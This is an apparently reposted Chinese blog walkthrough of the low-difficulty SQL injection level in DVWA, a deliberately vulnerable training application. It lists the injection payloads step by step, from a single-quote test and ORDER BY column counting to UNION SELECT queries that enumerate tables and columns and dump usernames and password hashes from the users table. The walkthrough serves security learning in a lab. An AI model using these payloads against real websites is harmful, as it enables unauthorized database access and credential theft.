首页 > 数据库技术 > 详细

dvwa闯关——low级SQL

时间:2020-01-04 10:54:46      阅读:105      评论:0      收藏:0      [点我收藏+]

sql注入:攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

一、判断是否存在注入点:

  1.1;正常

  技术分享图片

 

   2.1‘;加上一个单引号报错

  技术分享图片

 

   3.1’ and ‘1‘=‘1;正常

  技术分享图片

 

   说明存在注入点

二、判断字段数

  1.1‘ order by 2#

  技术分享图片

 

   2.1‘ order by 3#;到3就报错了,说明只有两个字段

   技术分享图片

 

 三、确定回显位置

  1‘ union select 1,2#

  技术分享图片

 

 四、查询当前数据库和版本

  1‘ union select version(),database()#

  技术分享图片

 

 五、获取数据库中的表

  1‘ union select 1,table_name from information_schema.tables where table_schema=‘dvwa‘#

  技术分享图片

 

 六、获取users表中的字段名

  1‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users‘#

  技术分享图片

 

 七、获取表中的一些数据

  1‘ union select user,password from users#

  技术分享图片

dvwa闯关——low级SQL

原文:https://www.cnblogs.com/walkwaters/p/12147679.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!